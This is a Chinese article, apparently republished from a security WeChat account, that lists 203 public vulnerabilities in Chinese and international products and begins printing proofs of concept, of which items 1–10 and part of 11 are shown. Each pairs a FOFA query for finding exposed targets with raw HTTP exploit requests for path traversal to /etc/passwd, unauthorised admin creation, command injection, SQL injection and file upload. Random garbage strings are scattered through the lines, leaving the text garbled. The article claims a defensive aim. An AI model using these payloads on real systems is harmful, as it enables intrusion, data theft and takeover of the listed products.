互联网公开漏洞整理202309-202406
6 \) {( \9 I, y+ u: k道一安全 2024-06-05 07:41 北京, Y' z: t8 [2 ]' p! [
以下文章来源于网络安全新视界 ,作者网络安全新视界
9 |4 P, S* P4 a" c- K
# i5 Z0 x U4 H* R1 F. Z发文目的:Nday漏洞的利用是安全攻防占比较大的攻击方式,希望文章对大家的防守提供一定帮助。防守同学可根据本文内容进行风险排查。: V8 p( x; y: O4 ~8 [
; j( P) Y4 m" g, G! z) Z漏洞来源:文章涵盖2023年9月至2024年5月国内外公开的高危害漏洞POC共203个,均来自于互联网其他公众号或者网站,由网络安全新视界团队进行整理发布。3 S9 l0 T3 @" j( O* b# K7 W
" `7 f5 b) h ]; b安全补丁:所有的漏洞均为公开漏洞,补丁或漏洞修复方案请联系产品厂家。' h4 Y/ ~4 {+ [' M
/ T/ s! }/ g6 w- E0 i5 ^- S
文章内容:因受篇幅限制,个别漏洞POC由于过长,统一使用PAYLOAD字样代替,如需完整POC请自行搜索。! \& D$ Q$ f4 _( _( U
& k3 i/ K4 [" R3 d/ {6 |3 ^
合法权益:如文章内容侵犯某方合法权益,请后台联系网络安全新视界团队对相关内容进行删除。
2 X6 v+ h i+ {( j* m1 @, B
' w9 i$ o1 Y: P l5 V, w5 L( t- d8 x9 c( k0 @, w
声明8 i4 @+ h/ ?$ n
2 @5 C. v% s3 o6 m0 d" j为简化流程,方便大家翻阅,固不设置“回复再给完整列表”。本文章就是当前最全文章,使用时F12搜索关键词即可。
1 b$ W$ ?$ Q' a8 L0 z
/ q7 K% l& t7 p( {- K2 ^有需要的可以收藏此文。也可以关注本公众号(网络安全新视界)。% J* j+ f/ y; \5 r) P$ I
$ `1 o+ w5 h" w3 S7 D, `( ~* z
, {" B0 D. Y2 W0 K6 F, D
9 A8 I- |, k& f8 D' W4 Y% c目录; \: Y0 i1 l$ a0 D9 H
4 z( j8 r8 u, ?& G% `. ]01; l: i$ l Q, h
& ]1 j d" W0 P8 `6 e8 X1. StarRocks MPP数据库未授权访问
5 _! n) J: K% Q2. Casdoor系统static任意文件读取
5 } u4 e8 b4 P p {3. EasyCVR智能边缘网关 userlist 信息泄漏. ~$ S- w5 k6 Z$ g3 S3 E
4. EasyCVR视频管理平台存在任意用户添加& Y' H6 R5 n- f1 O" ]
5. NUUO NVR 视频存储管理设备远程命令执行
" h; R: {* g; O9 O6. 深信服 NGAF 任意文件读取
/ W" [# m g7 N' U) y6 Z8 g7. 鸿运主动安全监控云平台任意文件下载
. t. _! h+ A }0 g: L8. 斐讯 Phicomm 路由器RCE
0 j% ]1 w# g; c% c) ?8 t6 g9. 稻壳CMS keyword 未授权SQL注入8 E' t7 K* K5 k3 L' ] m
10. 蓝凌EIS智慧协同平台api.aspx任意文件上传1 ~) S# B, }4 F# G- {) N+ z+ [
11. 蓝凌EIS智慧协同平台 doc_fileedit_word.aspx SQL注入
+ e$ r l% s* ?( x- X- Y12. Jorani < 1.0.2 远程命令执行4 S/ J" j b( T: Z) c' V, }
13. 红帆iOffice ioFileDown任意文件读取2 M5 e$ x' w4 _* E% |
14. 华夏ERP(jshERP)敏感信息泄露
6 \ R$ i1 Y+ K6 s15. 华夏ERP getAllList信息泄露; t% o a- O, D- e' e6 C
16. 红帆HFOffice医微云SQL注入
: [3 W& d: E% C) q8 j+ H3 u& T17. 大华 DSS itcBulletin SQL 注入) m( e1 o9 _1 B! p' l, u; _
18. 大华 DSS 数字监控系统 user_edit.action 信息泄露/ m$ r8 C8 R* {3 }2 P% b; \4 i
19. 大华 DSS 数字监控系统 attachment_clearTempFile.action SQL注入
6 S- B0 F6 z4 E+ B( d20. 大华ICC智能物联综合管理平台任意文件读取
% d: D1 I4 S6 ~4 V21. 大华ICC智能物联综合管理平台random远程代码执行" T' x2 ~$ h) i+ h; t) d0 N
22. 大华ICC智能物联综合管理平台 log4j远程代码执行
! ?6 ?2 c$ D5 W% Y& d- L2 E9 z23. 大华ICC智能物联综合管理平台 fastjson远程代码执行 w7 S) S0 M8 a) l- C/ i: K, O$ q
24. 用友NC 6.5 accept.jsp任意文件上传
" c+ f! Y0 ^* A+ s! ~25. 用友NC registerServlet JNDI 远程代码执行
/ v2 P& }$ a, L" T. o9 B26. 用友NC linkVoucher SQL注入
8 z* H4 B ^/ z( S! V! P27. 用友 NC showcontent SQL注入
6 p7 A* E* P5 I8 G v* I$ l28. 用友NC grouptemplet 任意文件上传
2 N# C2 G, g" T, l1 A29. 用友NC down/bill SQL注入
7 t* `; R3 R+ a30. 用友NC importPml SQL注入
+ H4 ?# C: l ~( G5 G; o31. 用友NC runStateServlet SQL注入4 E+ S8 e/ W) S, x0 \
32. 用友NC complainbilldetail SQL注入2 I+ A( |, _) {9 u
33. 用友NC downTax/download SQL注入
& D4 T8 ?$ E4 n34. 用友NC warningDetailInfo接口SQL注入
) q7 M2 z% P. _1 T35. 用友NC-Cloud importhttpscer任意文件上传& Z# e0 D2 v {8 B
36. 用友NC-Cloud soapFormat XXE2 C/ U# ?7 i+ T, }5 K" [) W+ ~
37. 用友NC-Cloud IUpdateService XXE* T# i5 R' ^5 w- C: A9 C* o; m8 J
38. 用友U8 Cloud smartweb2.RPC.d XXE
! r3 Z; C7 M. J# {2 M+ J39. 用友U8 Cloud RegisterServlet SQL注入
' ?) w! S7 ]# u7 @40. 用友U8-Cloud XChangeServlet XXE$ o" E1 O' ^! w
41. 用友U8 Cloud MeasureQueryByToolAction SQL注入
( I1 y( ?4 {/ u# K7 p! c42. 用友GRP-U8 SmartUpload01 文件上传
+ r, ^& H) q, K( z# ?43. 用友GRP-U8 userInfoWeb SQL注入致RCE
# L) j3 a3 m: a+ C44. 用友GRP-U8 bx_dj_check.jsp SQL注入" o- V) a$ B, ]$ }) y; [
45. 用友GRP-U8 ufgovbank XXE
7 u, t" W+ J k( d# V! C6 Z46. 用友GRP-U8 sqcxIndex.jsp SQL注入
) o# n! B0 Q. C" P47. 用友GRP A++Cloud 政府财务云 任意文件读取
+ j( b$ E" t+ _: k" E( P }48. 用友U8 CRM swfupload 任意文件上传
2 n' S- Q* C2 C6 J# R( J m$ w49. 用友U8 CRM系统uploadfile.php接口任意文件上传
+ ?: {7 r: |5 b50. QDocs Smart School 6.4.1 filterRecords SQL注入) r6 |6 g# b# e5 T' B1 j& w- B; m$ a
51. 云时空社会化商业 ERP 系统 validateLoginName SQL 注入8 O$ p- R# F9 R- w
52. 泛微E-Office json_common.php sql注入$ M" f+ @1 H4 }+ G6 w
53. 迪普 DPTech VPN Service 任意文件上传- n. r) m( n( ~5 [* A* f4 S/ P
54. 畅捷通T+ getstorewarehousebystore 远程代码执行
/ p5 W! s: ^ e' L3 x+ d: A55. 畅捷通T+ getdecallusers信息泄露' s+ K c3 V8 P7 w
56. 畅捷通T+ RRATableController,Ufida.T.DI.UIP.ashx 反序列化RCE. n( U) ~! {# d" ]% l
57. 畅捷通T+ keyEdit.aspx SQL注入
' \- @1 z3 i' I58. 畅捷通T+ KeyInfoList.aspx sql注入+ @) I/ a4 A! O5 \ r* V, |
59. XETUX 软件 dynamiccontent.properties.xhtml 远程代码执行
& P* z1 {5 U. a60. 百卓Smart管理平台 importexport.php SQL注入" Y9 T; C2 d2 B* k% |3 d
61. 浙大恩特客户资源管理系统 fileupload 任意文件上传 `: h8 d( x( d& m2 ]% r
62. IP-guard WebServer 远程命令执行. V( Q" i/ m+ ^' T/ K
63. IP-guard WebServer任意文件读取
7 y7 s" i: A4 s% T- r; H/ L64. 捷诚管理信息系统CWSFinanceCommon SQL注入' S5 u- ?5 _7 W4 N, a
65. 优卡特脸爱云一脸通智慧管理平台1.0.55.0.0.1权限绕过+ w6 F; I. p6 [8 N' Z
66. 万户ezOFFICE协同管理平台SendFileCheckTemplateEdit-SQL注入
) m$ F" x0 U( ~4 \+ G" _67. 万户ezOFFICE wpsservlet任意文件上传
@1 C# ]* Z/ d3 }+ w68. 万户ezOFFICE wf_printnum.jsp SQL注入( A5 h! N& n8 }% B5 E' K i! C
69. 万户 ezOFFICE contract_gd.jsp SQL注入: o8 W: X6 q; x1 g2 p5 R9 W
70. 万户ezEIP success 命令执行
) i) z8 W3 i/ j8 `$ x! }, ^* X7 ~71. 邦永PM2项目管理系统 Global_UserLogin.aspx SQL注入' s% L! q J* g' z: e
72. 致远OA getAjaxDataServlet XXE
/ a& G5 A" A& t' g% G73. GeoServer wms远程代码执行7 c4 q" t5 H5 m% q3 C
74. 致远M3-server 6_1sp1 反序列化RCE
) v5 H2 \; q+ j' t; p4 A; l75. Telesquare TLR-2005Ksh 路由器 admin.cgi RCE. Z* A- i# ~- ^5 n: C7 R1 R
76. 新开普掌上校园服务管理平台service.action远程命令执行
; k6 U; ]& x: P7 E* [% R77. F22服装管理软件系统UploadHandler.ashx任意文件上传& j8 B7 m& i9 m6 Y! G* ~
78. pkpmbs 建设工程质量监督系统 FileUpload.ashx 文件上传
1 A; g' [! ] t1 I+ ]79. BYTEVALUE 百为流控路由器远程命令执行
( d6 q7 y7 m$ {- T# q80. 速达天耀软件DesignReportSave.jsp接口存在任意文件上传
) k, N1 K ]3 D5 V% O81. 宇视科技视频监控宇视(Uniview)main-cgi密码泄露
5 } M" b' t% K+ Z8 ^ y82. 思福迪LOGBASE运维安全管理系统 test_qrcode_b 远程命令执行& \9 F1 v, p; `4 ]. n9 @
83. JeecgBoot testConnection 远程命令执行* s) r9 N- L+ M2 n6 B
84. Jeecg-Boot JimuReport queryFieldBySql 模板注入
- u" k8 K' W$ ?' Z+ L7 {85. SysAid On-premise< 23.3.36远程代码执行
) B1 O) d% r- `% N* f86. 日本tosei自助洗衣机RCE
1 x/ H M3 I7 S9 x% \1 \4 H87. 安恒明御安全网关aaa_local_web_preview文件上传% y; _- o$ m" |. B1 p
88. 安恒明御安全网关 aaa_portal_auth_config_reset 远程命令执行( c2 I1 u2 j5 M0 {* H+ q9 P( z
89. 致远互联FE协作办公平台editflow_manager存在sql注入
6 d3 ` Y* X9 q9 T3 [! c+ d90. 海康威视IP网络对讲广播系统3.0.3_20201113_RELEASE远程命令执行% w6 {+ a( \6 M9 D
91. 海康威视综合安防管理平台orgManage/v1/orgs/download任意文件读取/ Q. ^+ c. o2 i$ H) H6 D' I% n0 a2 Q7 _
92. 海康威视运行管理中心session命令执行
+ W% }, U o4 j4 X( w$ W/ { [6 K93. 奇安信网神SecGate3600防火墙app_av_import_save任意文件上传
! e: d& [; D5 \3 N94. 奇安信网神SecGate3600防火墙obj_area_import_save任意文件上传# d5 c5 i/ {5 q8 U4 C( z
95. Apache-OFBiz < 18.12.10 xmlrpc远程代码执行
) k5 n, p2 `3 r96. Apache OFBiz 18.12.11 groovy 远程代码执行
% f& P0 s6 {9 ^97. OneBlog v2.2.2 博客Shiro反序列化远程命令执行- r8 e6 Y4 d& B5 B1 `) x1 e9 |; q/ E
98. SpiderFlow爬虫平台远程命令执行# |' n) r. c$ P" V; ~. T8 H
99. Ncast盈可视高清智能录播系统busiFacade RCE
2 U/ j/ m# Z u @. [100. Likeshop 2.5.7.20210311 File.php userFormImage 文件上传5 ~/ w/ i. F2 t5 c; _
101. ivanti policy secure-22.6命令注入+ q/ h6 A j) b. d h9 ^
102. Ivanti Pulse Connect Secure VPN SSRF致远程代码执行
' A8 l' h* t) {0 X* Z103. Ivanti Pulse Connect Secure VPN XXE7 H2 {, O! X8 m
104. Totolink T8 设置 cstecgi.cgi getSysStatusCfg 信息泄露
) ^) Q- O' u- P9 \! P105. SpringBlade v3.2.0 export-user SQL 注入7 i- R6 y' d! x5 N. l' F
106. SpringBlade dict-biz/list SQL 注入" b, u7 ~. J9 X2 |: w+ G# ?8 f- d1 y
107. SpringBlade tenant/list SQL 注入8 _( s9 S! \2 n4 S# K
108. D-Tale 3.9.0 SSRF( A' c' `3 _: w( `+ r, _0 c& F
109. Jenkins CLI 任意文件读取5 w, I& o7 R+ @% `' e
110. Goanywhere MFT 未授权创建管理员. G; x3 _- L6 s! k- l2 J
111. WordPress Plugin HTML5 Video Player SQL注入8 ]: d) l7 N4 |$ M# B9 D
112. WordPress Plugin NotificationX SQL 注入9 e' K5 U$ \8 P; K* K9 \: e
113. WordPress Automatic 插件任意文件下载和SSRF
1 U m+ J. n( `- [) R114. WordPress MasterStudy LMS插件 SQL注入
* q5 C- F8 ~# S2 l3 u6 o2 L9 ~115. WordPress Bricks Builder <= 1.9.6 RCE
, V4 i2 j G+ m7 d116. wordpress js-support-ticket文件上传, r5 b, H: r8 j, a, H4 }
117. WordPress LayerSlider插件SQL注入
J" u* N5 j6 p V) J118. 北京百绰智能S210管理平台uploadfile.php任意文件上传
, O" ^6 D- |- T; h; e. s# Y9 L119. 北京百绰智能S20后台sysmanageajax.php sql注入# |* ], p8 i; o! W
120. 北京百绰智能S40管理平台导入web.php任意文件上传! g' g4 I# `# S5 Y0 j( x
121. 北京百绰智能S42管理平台userattestation.php任意文件上传; ~8 ^- {! `: k' d! ^- V- F" h# f
122. 北京百绰智能s200管理平台/importexport.php sql注入( a2 R, R* L( q% D }, n0 g. X5 R3 _
123. Atlassian Confluence 模板注入代码执行
9 N: g, q* s; \% m0 h124. 湖南建研工程质量检测系统任意文件上传+ L8 p, V: _9 R1 G' J3 N
125. ConnectWise ScreenConnect身份验证绕过" Y1 ]4 @. i- o. S1 F2 U% ^8 z
126. Aiohttp 路径遍历8 O0 l5 T$ H: E; o: _
127. 广联达Linkworks DataExchange.ashx XXE1 _( s% z Q+ K1 L4 ~9 _
128. Adobe ColdFusion 反序列化
9 K; k% k; m. q129. Adobe ColdFusion 任意文件读取
5 }* U2 R" A& ]8 ~! G- {; x4 g130. Laykefu客服系统任意文件上传
; W6 [+ t# p: i131. Mini-Tmall <=20231017 SQL注入
# Z3 u/ ]8 }! z! ?132. JetBrains TeamCity 2023.11.3 及以下版本存在身份验证绕过
8 h- J' T% s# X' Q133. H5 云商城 file.php 文件上传0 Y# Y o7 Q3 y% @, y5 I
134. 网康NS-ASG应用安全网关index.php sql注入: _7 Y0 d% R% {) u: c t
135. 网康NS-ASG应用安全网关list_ipAddressPolicy.php sql注入7 h" Q2 Z- o B$ t' ?2 q
136. NextChat cors SSRF9 H5 P7 ]# s) S
137. 福建科立迅通信指挥调度平台down_file.php sql注入7 G& D- d0 B5 [% R p
138. 福建科立讯通信指挥调度平台pwd_update.php sql注入& `7 G2 a% f: N$ e! P
139. 福建科立讯通信指挥调度平台editemedia.php sql注入
1 l# h8 o* ^* v140. 福建科立讯通信指挥调度平台get_extension_yl.php sql注入: \3 I6 F2 K3 ~/ H
141. 建科立讯通信指挥调度管理平台 ajax_users.php SQL注入
m4 w( C5 U" W142. CMSV6车辆监控平台系统中存在弱密码# ?; H$ a& ^: `1 i: ]
143. Netis WF2780 v2.1.40144 远程命令执行
9 L% U) {3 b- \144. D-Link nas_sharing.cgi 命令注入' f g8 v( X/ D& G6 w$ x+ W
145. Palo Alto Networks PAN-OS GlobalProtect 命令注入4 r0 @; Z* s }+ d4 s/ V" i U& D4 n
146. MajorDoMo thumb.php 未授权远程代码执行
/ b' ~. C, F; I4 q5 Q147. RaidenMAILD邮件服务器v.4.9.4-路径遍历2 [, _. k; ~" W8 F* s" q% Z
148. CrushFTP 认证绕过模板注入
- v! l8 A. _8 f2 w {+ Y6 }149. AJ-Report开源数据大屏存在远程命令执行
. a) S4 y& u( V7 q$ r* E150. AJ-Report 1.4.0 认证绕过与远程代码执行
9 f/ g% Y+ t. j$ W" e0 V& q; j% e151. AJ-Report 1.4.1 pageList sql注入
! J% }) P) ?3 o3 f& A/ ^- c8 [$ F5 B152. Progress Kemp LoadMaster 远程命令执行
6 j3 U$ e6 y0 u/ E1 z153. gradio任意文件读取3 M# U9 Z' u. s6 s, C
154. 天维尔消防救援作战调度平台 SQL注入4 i; Q# K8 m2 N' X. ]5 M+ C$ [ c3 q
155. 六零导航页 file.php 任意文件上传8 q8 ]* R* [. X0 @* \
156. TBK DVR-4104/DVR-4216 操作系统命令注入' d. A$ I5 d- A8 f K4 i; c- P
157. 美特CRM upload.jsp 任意文件上传8 h) Q; n- D2 {. N
158. Mura-CMS-processAsyncObject存在SQL注入+ G( m# N- r7 V; ?" t2 q) i: e
159. 英飞达医学影像存档与通信系统 WebJobUpload 任意文件上传7 {) E9 V& L/ d8 u! ~* h
160. Sonatype Nexus Repository 3目录遍历与文件读取
6 R; G ^( b% v8 W7 D" u161. 科拓全智能停车收费系统 Webservice.asmx 任意文件上传+ k6 W y3 _& D4 e
162. 和丰多媒体信息发布系统 QH.aspx 任意文件上传
4 q- j6 g+ F$ s. [- j( U163. 号卡极团分销管理系统 ue_serve.php 任意文件上传. t4 D' L( ^8 f! Y
164. 慧校园(安校易)管理系统 FileUpProductupdate.aspx 任意文件上传6 w5 d4 O5 T) u2 m
165. OrangeHRM 3.3.3 SQL 注入
( }4 g$ |' z' t/ d3 n166. 中成科信票务管理平台SeatMapHandler SQL注入0 j4 A/ E# A" u2 Y5 q) v
167. 精益价值管理系统 DownLoad.aspx任意文件读取# w+ k3 Z+ v3 Q& U
168. 宏景EHR OutputCode 任意文件读取$ ] j0 H/ ~7 {) G$ a7 L4 j( p
169. 宏景EHR downlawbase SQL注入% k1 w# L! K3 S4 y# c
170. 宏景EHR DisplayExcelCustomReport 任意文件读取
* Y0 s5 O# y* ~* I171. 通天星CMSV6车载定位监控平台 SQL注入
: h4 D0 }% D3 o: W. h: z5 J172. DT-高清车牌识别摄像机任意文件读取: S3 C. v3 i- W5 Y1 W' v. x
173. Check Point 安全网关任意文件读取 `0 W$ N" J& V. M9 y4 a7 h
174. 金和OA C6 FileDownLoad.aspx 任意文件读取& N. P3 q& f- u( D7 y
175. 金和OA C6 IncentivePlanFulfill.aspx SQL注入
! `% T5 T0 E: L; s176. 电信网关配置管理系统 rewrite.php 文件上传# p ]8 c, T, _. h$ |5 m5 w
177. H3C路由器敏感信息泄露1 ~! } ]$ w. Z3 {
178. H3C校园网自助服务系统-flexfileupload-任意文件上传
4 c E0 S$ E! X% { o1 c8 r2 l179. 建文工程管理系统存在任意文件读取6 V# i) {3 M! E- D; C
180. 帮管客 CRM jiliyu SQL注入
& t% V3 z& N, S- i" c, o( l181. 润申科技企业标准化管理系统 UpdataLogHandler.ashx SQL注入
* v- P& w e, f' A, Z) B182. 润申科技企业标准化管理系统AddNewsHandler.ashx 任意用户创建; G; X m6 b* E6 G" X6 d' C1 f" }
183. 广州图创图书馆集群管理系统 updOpuserPw SQL注入5 G" `; I: c& F: D# }8 K
184. 迅饶科技 X2Modbus 网关 AddUser 任意用户添加2 ?: P2 s: S* L) y5 Q! n) Y
185. 瑞友天翼应用虚拟化系统SQL注入
( z( t- S2 O2 P9 Q# L- o186. F-logic DataCube3 SQL注入: s! d, p T8 l. F
187. Mura CMS processAsyncObject SQL注入5 f( [9 X+ t4 I
188. 叁体-佳会视频会议 attachment 任意文件读取; q) h; W* m; o9 |" n5 I' x# x
189. 蓝网科技临床浏览系统 deleteStudy SQL注入# v# O6 a3 e, _1 y+ s
190. 短视频矩阵营销系统 poihuoqu 任意文件读取
& J6 v* a$ T* z; G A191. 亿赛通电子文档安全管理系统 NavigationAjax SQL注入
. u7 l! D! P0 y% b. N192. 富通天下外贸ERP UploadEmailAttr 任意文件上传
' `0 m& X' S# k. D' Z193. 山石网科云鉴安全管理系统 setsystemtimeaction 命令执行
' o+ T! K6 Y0 [. F& e4 u: P* Z194. 飞企互联-FE企业运营管理平台 uploadAttachmentServlet 任意文件上传
7 Q( j) j y! p, t' V' a195. 飞鱼星上网行为管理系统 send_order.cgi命令执行
3 N, D3 t7 ~7 e* H; ]196. 河南省风速科技统一认证平台密码重置
. p9 Q) e0 p9 n1 p K" { w197. 浙大恩特客户资源管理系统-Quotegask_editAction存在SQL注入0 w, t% |. w2 Q/ W0 [* z
198. 阿里云盘 WebDAV 命令注入
7 s, F4 I# s9 X' s f* I199. cockpit系统assetsmanager_upload接口 文件上传! E. d$ P8 [ h
200. SeaCMS海洋影视管理系统dmku SQL注入
+ J* ^, V3 f' ?9 b201. 方正全媒体新闻采编系统 binary SQL注入
& Z8 O% ?3 \& Q6 \202. 微擎系统 AccountEdit任意文件上传
4 U* B; \& b+ L3 ~9 C203. 红海云EHR PtFjk 文件上传
y* @4 y+ O7 i+ H0 e* `- P$ p! w, q; a0 d# P% G
POC列表1 m( O+ S/ |4 d0 k4 {
) w3 k, N5 L% J2 B( R9 {- H7 c
027 R, [5 i k, H/ l$ ^. o1 x9 Y
Q8 m" R) y! m4 q1. StarRocks MPP数据库未授权访问" [) S" P% b% Z+ C8 E9 C
FOFA :title="StarRocks"
9 N) z, i0 Z8 y$ e" WGET /mem_tracker HTTP/1.12 X8 V4 n) R# f( y0 o, v7 `
Host: URL( ^5 z* T& Z; p% J4 f" i5 P4 z
* M# u, u# `+ ?& k8 }
$ g' C) u7 r( ?) [2. Casdoor系统static任意文件读取5 |2 h1 ]3 T8 j; F5 D
FOFA :title="Casdoor"* D4 Y' V/ x, |" p2 Q6 l. U
GET /static/../../../../../../../../../../../etc/passwd HTTP/1.1
9 [. D* j, r6 k5 HHost: xx.xx.xx.xx:9999
6 ^4 ]' V. h; i @1 P$ ^7 o: X0 uUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.367 k0 f) ^: x- _! }6 @0 r
Connection: close
$ z- o @+ S6 bAccept: */*3 o( X, K. `& F4 x
Accept-Language: en5 w5 W; C+ E. J/ [
Accept-Encoding: gzip
( _' ~4 P# _0 h" K: i$ P* o& W& `/ Y7 S/ @6 K9 p. A( s3 d
5 y* ?8 S* m. I/ ?. k) i3. EasyCVR智能边缘网关 userlist 信息泄漏7 t- V) ?( H0 L* H6 M' n0 X
FOFA :title="EasyCVR"2 Y8 A3 u" H) }
GET /api/v1/userlist?pageindex=0&pagesize=10 HTTP/1.16 P6 {1 i* n4 G# I% T* S
Host: xx.xx.xx.xx
: [$ t% Y) P7 r
0 H( M% o4 d5 `# B4 H' w& ?
3 a% R5 i0 i N$ U" C* \9 n9 G: z4. EasyCVR视频管理平台存在任意用户添加
; } I9 A, X9 ~' T# q9 n# FFOFA :title="EasyCVR"
+ N! P, t8 [% b
5 W! H$ O& p& q& h$ P' qpassword更改为自己的密码md5: T7 N; S6 T9 a9 l
POST /api/v1/adduser HTTP/1.1
! J* ? k# G8 u% s' H2 EHost: your-ip
* z6 ?/ S& A& W1 v$ V. h: `6 [- p( r# NContent-Type: application/x-www-form-urlencoded; charset=UTF-8
& j- i# _3 w& K0 H; ?* T" u, n/ e* W$ e9 d+ ]$ |
name=admin888&username=admin888&password=0e7517141fb53f21ee439b355b5a1d0a&roleid=1
& X& J! s- a! M+ p. b8 M
5 g! K& M- K7 {% r1 o" N( A A5 F* F% h5 i+ V3 c3 E
5. NUUO NVR 视频存储管理设备远程命令执行* j8 O, M1 p6 H+ L6 y6 \, I" T
FOFA:title="Network Video Recorder Login"
( e2 G, p+ H: E3 D) [GET /__debugging_center_utils___.php?log=;whoami HTTP/1.13 s& m2 Q2 c( s2 w+ J$ M, }, a; O
Host: xx.xx.xx.xx
4 w0 M. |% w6 W/ e. m' v% U$ i6 T W0 L- B9 ^3 m
# {( e/ S" t# G( T3 x- y8 u6. 深信服 NGAF 任意文件读取
( T* Z$ J! v' n/ z2 LFOFA:title="SANGFOR | NGAF"1 u4 H9 F& A; r: u- x
GET /svpn_html/loadfile.php?file=/etc/./passwd HTTP/1.1
0 R' r: m. u" U/ XHost:
- g9 q, L5 Q0 N7 P5 T/ O. c0 I5 h) f, ^. A) y8 K4 T' k$ P6 X
7 E$ f# j1 E, e7 b: h7. 鸿运主动安全监控云平台任意文件下载& I6 k+ A% z+ j( @- D- V( D% Q
FOFA:body="./open/webApi.html"4 O A9 Y/ a @7 d8 Q+ b% E5 H
GET /808gps/MobileAction_downLoad.action?path=/WEB-INF/classes/config/jdbc.properties HTTP/1.1
) a! M6 b; U) x6 g: hHost:3 n q- w9 n4 u/ i% c3 G* i
! P" ^* @( H# H8 n
/ Q1 A T3 ]% h( `+ Z
8. 斐讯 Phicomm 路由器RCE
( q0 \) `' i4 _- E! d* A% H# SFOFA:icon_hash="-1344736688": _) @2 `2 }4 {$ B9 i
默认账号admin登录后台后,执行操作
9 Z2 f) u. d( k/ S3 V W: ]2 IPOST /cgi-bin/luci/;stok=bcd6ccd2fa5d212ce6431ca22f10b96d/admin/wifireboot HTTP/1.1
- ]9 X, Y6 ?& i9 h/ N* lHost: x.x.x.x+ q; u6 _3 N/ {3 t. w! ]/ R
Cookie: sysauth=第一步登录获取的cookie {$ d" y' x9 }3 a9 u) ?0 z
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxbgjoytz/ T8 K/ E# Y! c. H0 M5 f. b' k1 w
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36; s/ c& m0 F" c6 D
9 M8 }+ v- v i9 L) R, |' h6 @
------WebKitFormBoundaryxbgjoytz
+ L& @& f2 w4 v3 u9 ZContent-Disposition: form-data; name="wifiRebootEnablestatus"
1 H$ {) E, u! h6 r
2 a# |! X6 A$ E0 j" K, [%s
) x$ w4 o, H9 D6 \5 s0 {------WebKitFormBoundaryxbgjoytz7 E S9 h. A8 \: |+ H
Content-Disposition: form-data; name="wifiRebootrange"
0 a# `! a# a6 t, y# T# p& V; l
4 ]3 m1 p1 Y* V, A5 I% J12:00; id;: E9 w* W' Y Y
------WebKitFormBoundaryxbgjoytz0 n) D0 F/ x1 U
Content-Disposition: form-data; name="wifiRebootendrange"
4 ?% |1 c/ @: m; V+ i M+ s- t
0 B2 O& D8 [* k/ ?9 ]%s:
: e+ I# a" v5 e# o) K1 z/ L. h. s------WebKitFormBoundaryxbgjoytz
7 O! d6 c+ k3 V; K0 kContent-Disposition: form-data; name="cururl2"
! f7 y- g$ b2 D& t
! F6 e. L7 ?+ H- p$ o* ?8 T- i3 Z6 v2 t- o( N2 a: q6 I
------WebKitFormBoundaryxbgjoytz--
+ W5 k& ^& r: ] T7 b V, \- U8 K$ e7 x# M+ R- c9 y. h. i1 ?$ p
7 `0 W3 c& h6 X8 }1 y C
9. 稻壳CMS keyword 未授权SQL注入8 J1 r W, ?* Z1 j9 f. q2 L
FOFA:app="Doccms", U9 b& I$ P& l, I% {" {2 Z3 @' x
GET /search/index.php?keyword=1%25%32%37%25%32%30%25%36%31%25%36%65%25%36%34%25%32%30%25%32%38%25%36%35%25%37%38%25%37%34%25%37%32%25%36%31%25%36%33%25%37%34%25%37%36%25%36%31%25%36%63%25%37%35%25%36%35%25%32%38%25%33%31%25%32%63%25%36%33%25%36%66%25%36%65%25%36%33%25%36%31%25%37%34%25%32%38%25%33%30%25%37%38%25%33%37%25%36%35%25%32%63%25%32%38%25%37%33%25%36%35%25%36%63%25%36%35%25%36%33%25%37%34%25%32%30%25%37%35%25%37%33%25%36%35%25%37%32%25%32%38%25%32%39%25%32%39%25%32%63%25%33%30%25%37%38%25%33%37%25%36%35%25%32%39%25%32%39%25%32%39%25%32%33 HTTP/1.1; E2 ?9 C% I) `& J% S
Host: x.x.x.x
9 @2 a( q P) _8 |# q9 X. z0 r8 s5 k! Y0 h
% Z% `; V9 C( D8 [4 ?payload为下列语句的二次Url编码% z! P$ k9 v* I1 R
& Z) Z1 p& S0 z/ E% a' and (extractvalue(1,concat(0x7e,(select user()),0x7e)))#1 R1 q7 J, _' g% q- e0 x
* s+ ^: m4 D0 p( N& Q
10. 蓝凌EIS智慧协同平台api.aspx任意文件上传; |( x6 Q I1 s# r+ D3 z2 e. H6 ]
FOFA:icon_hash="953405444"$ ?; g9 R+ t& I) I0 h( H9 ~
7 v2 l, L5 o4 O9 s/ W
文件上传后响应中包含上传文件的路径9 R* }9 b/ ]% v
POST /eis/service/api.aspx?action=saveImg HTTP/1.1
5 i( e2 B; i0 oHost: x.x.x.x:xx
9 z( S6 Y7 O# ?% q$ r( _9 gUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
, h9 S% M; f. Z9 u7 x$ Y9 z; o- BContent-Length: 197# T! v+ _* K* J( r
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.95 ]9 q9 l$ c) e& Z
Accept-Encoding: gzip, deflate$ C# E7 u, a `3 c* y
Accept-Language: zh-CN,zh;q=0.9
0 x- M/ b- e* x) n1 G8 CConnection: close
$ _0 C+ P. B+ Q$ ]9 h) cContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryxdgaqmqu
, z/ ~3 B/ Q* L4 z4 ]3 M v1 ]* p* L/ C/ M% d; n+ F
------WebKitFormBoundaryxdgaqmqu5 M2 S" Z+ F* I( H
Content-Disposition: form-data; name="file"filename="icfitnya.txt"
+ q7 O! T6 O; w8 AContent-Type: text/html
/ ^1 L/ G: m' v: _
8 T& S% U3 B+ W' xjmnqjfdsupxgfidopeixbgsxbf0 }" w8 m2 b* ]8 I; _3 X9 I( i& R. t
------WebKitFormBoundaryxdgaqmqu--
% l5 c( X2 x$ n2 p/ H+ F3 E
1 O1 @# j$ E; |. L1 E: O$ r* ^8 q) ^
11. 蓝凌EIS智慧协同平台 doc_fileedit_word.aspx SQL注入
% F( b/ H* s1 J5 J* [3 S8 BFOFA:icon_hash="953405444" || app="Landray-EIS智慧协同平台"0 O+ ]/ B9 L; W+ ?! |
